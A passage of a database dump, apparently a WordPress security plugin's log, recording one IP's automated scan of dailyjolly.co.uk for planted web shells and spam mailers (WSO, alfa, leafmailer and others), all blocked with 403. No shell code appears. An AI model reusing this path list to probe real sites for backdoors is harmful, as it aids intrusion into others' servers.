Safari\\/537.36\"}','Dgl7tozJ421rsphZecxfAqiM',0,1673896897.4760,192,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sGxitHJgPFdEq810NIpYwAUo',0,1673896911.6463,211,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/kindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hiQIX1p5LE6fVHetPKxZ8AJD',0,1673896926.1002,186,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/cpanel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7tGrfxRebqcyV4BOFowhJsMU',0,1673896942.6585,215,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/cp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UXF4mKOdipCHEbvz7x51hTSl',0,1673896959.4549,220,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','R8Ml2e0yEaPxBV3KDm7rYdwZ',0,1673896979.4611,196,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iJRsHZkh6gYaDPdjBneFpExQ',0,1673897007.4201,220,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rSIUb9mH3G87WzTMajQlv0Y5',0,1673897021.1317,194,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fhz6sbB0wDO9GqN7lEcAIkFM',0,1673897037.0208,227,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mboF3D2BxCqLfYSKQtH7kUgu',0,1673897051.7509,212,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5VvedPlRpCrjIt7UJn8wBGQ6',0,1673897066.6333,194,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XILiQylwt2jUOYx6NFAZWEMG',0,1673897080.6143,246,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wuQYR3o0jmtIPs1khandKlXg',0,1673897089.1683,193,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qEZRj8m3yCAGdsBUWniS2uHN',0,1673897089.6158,179,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dGJQxHD95SvLKCa7eOo4c6uZ',0,1673897090.0968,198,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','v9QBAlLnZsaytu1iPbHIVKNf',0,1673897090.5372,181,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CWnVDK6hyULFo3ut0biIae2E',0,1673897090.9557,184,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iL1CdepfzP8G5FMwYRD4maUr',0,1673897091.4529,191,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Cn4NZq1SPHJEFgXLfv3VGAja',0,1673897091.9431,182,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UCF54ZqQid0Tbuo9LcJkNrBY',0,1673897092.4075,186,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BYl4sWEmeCx5M1A8UkJXrSHy',0,1673897092.7876,158,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HSxvc1jg6WBZwDLtpbYaPr5h',0,1673897093.2142,174,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kFQUBDqC67pOJKSZnuaVWMd1',0,1673897093.6182,235,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vqgc6zUfAdJ8QBPWuMVbx0k1',0,1673897094.0883,186,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/xo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','whgZ9dGf7DT0L4vISnVtxWBY',0,1673897094.5958,163,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/mi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3KkFP21tfBohQ8IEg6MOjn0W',0,1673897094.9676,172,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/!.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','orXnEs25F3aAjgwC4yq8cPBN',0,1673897095.3632,216,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/alexusmailer2.0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jyOdovK2awVM5Qsq8ANDhWlS',0,1673897095.8399,164,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/rss.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rczTBnKs7ChbM94u2lH08dao',0,1673897096.2626,169,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UNCDynvfw8T3iBbXtuacsZI7',0,1673897096.7671,202,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NjSh5pP6TexL2IBzdVyvA4qO',0,1673897097.2615,163,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/alwso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','J74xbSUfgw8Le2azVWOrAlFp',0,1673897097.6157,185,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/includes/uploads/Va.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','t6wdN8f4iWhKQnMAulmSOVYb',0,1673897098.0309,219,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/uploads/readindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CWH68kncvTA9Z5pw0SR1P4be',0,1673897098.5201,187,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/uploads/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hrDSwBKmEdsUfnN49bWViXYP',0,1673897098.8872,167,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6nGbRSkl57NQXPBxAdVE8eqO',0,1673897099.3940,202,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/readindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oQMvDgEJs6NqprUtFjbmk2KB',0,1673897099.8279,181,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/maint/wp-readindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LRyAY0GwQkbKXDs5VU3FhiWP',0,1673897100.2084,179,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/maint/wp-cron.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','U5PDnqFjsbKhVi0Mu9ez4OdE',0,1673897100.5632,165,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/media-site.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1M4QSuEcYIJz9BO8tVmDfwjR',0,1673897100.9980,197,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ua04rnOKpGwu98CkMP7WdH3R',0,1673897101.3848,165,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/maint/repair-bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zMyF6paODwRrkvUGPqngWQ09',0,1673897101.9274,179,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/edit-tag-menu.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2JKuQMRNpT3otOiXCEZBG8SA',0,1673897102.3499,182,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/tablepress_controllers.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PhJs18ZMfyaoXecrl6NtvGng',0,1673897102.8077,167,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/block-line.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sFcuqZiv769xXYrkO0d3EmVn',0,1673897103.1692,197,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/css/modern/colors.css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nPALgXQyksb9WaM36cjON02Y',0,1673897103.5413,161,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-includes/sys.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PIV0v3yZ4tlNxTEzbhBDLKWC',0,1673897103.9353,169,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/includes/alexusmailer2.0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Fsk8GjwlQNDAozVxiIcRh2SP',0,1673897104.2748,185,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/includes/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sNGJel83MBSYc7vUAFZ5QaLo',0,1673897104.6629,178,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/includes/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','90QyKUJWwxLtk5TNrCIjbgpS',0,1673897105.0053,193,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/uploads/alexusmailer2.0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','thsX8LvFJx51cQ79l6dUgpMN',0,1673897105.3696,176,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/uploads/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','e5kxGsmK38aUuEOwHhTZNfcQ',0,1673897105.7356,193,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/uploads/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7NoeLR39S2QxnM1tdBqlKAyr',0,1673897106.1123,172,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jGrtw8psJW6VKndXQNu704Og',0,1673897106.4673,240,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZGlJnYEk0F8izKtWXSVTvf2d',0,1673897106.8809,179,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/includes/alexusmailer2.0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gvX2dU79e3TRFjwyuCLpfm5o',0,1673897107.2445,228,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IGDhXp4r0VmM7uiZk8Yag3fy',0,1673897107.6765,164,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Iqw38KsblxZTePaYJUS06rVi',0,1673897108.0205,172,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2xSUR5EjsIety8rk6WbMu9Om',0,1673897108.3712,174,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/fa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','V7f4ywp5U3JFIARWK2MPjumE',0,1673897108.7367,195,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/alexus-mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Y6PqQRlGZip4BoS59wmUKDbe',0,1673897109.1269,163,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','skHQnyAg6r2xPamp1MIV9Clh',0,1673897109.4716,180,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','307cPH1oqu6WSIj9AdrFwKzE',0,1673897109.8303,170,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nR35iSXydL19HceoGkqDBgOE',0,1673897110.1889,165,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-file.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5n8z3yUoBY67AbLG4fQlW9ma',0,1673897110.5270,173,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rheqGdAy0CRS7BZ6xEbpUzjK',0,1673897110.8813,176,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wso2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8tKqRcW4iChb6QwUBGFm9S2z',0,1673897111.2506,237,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2emixBK58LYjtZrNMlCE4UWV',0,1673897111.6610,219,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4DkwJa8FHeoWsrzd6Ub27QvB',0,1673897112.0553,230,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Bse7lGcodAqwb36xhI2tQzVj',0,1673897112.4599,163,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','y7BlXzntKdVHeRaiN0CQu2pc',0,1673897112.8122,180,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BKZd9M1ukaHq0p5zR7iODWIL',0,1673897113.1628,157,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','d3hcXsgr8i6x9n1WjukYCfOV',0,1673897113.4936,170,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-rss.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xdyNBLlonWc6OQtZajP9RJYv',0,1673897113.8568,159,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hyVFYx50rLXlT4pJZvIfqbMj',0,1673897114.1823,165,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','y1GTRAfWnjlILFbg6ODQSuHV',0,1673897114.5391,183,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9rV6voRahObBzYMeUA5LPZDI',0,1673897114.8973,192,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2oXlvMGLNEc18FKT79e6aYDd',0,1673897115.2548,206,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QE8mH51rtXCbKd9eAfaFO27x',0,1673897115.6897,165,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BrAbioVMGENC1Lsvg8TpXcD3',0,1673897116.0757,168,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 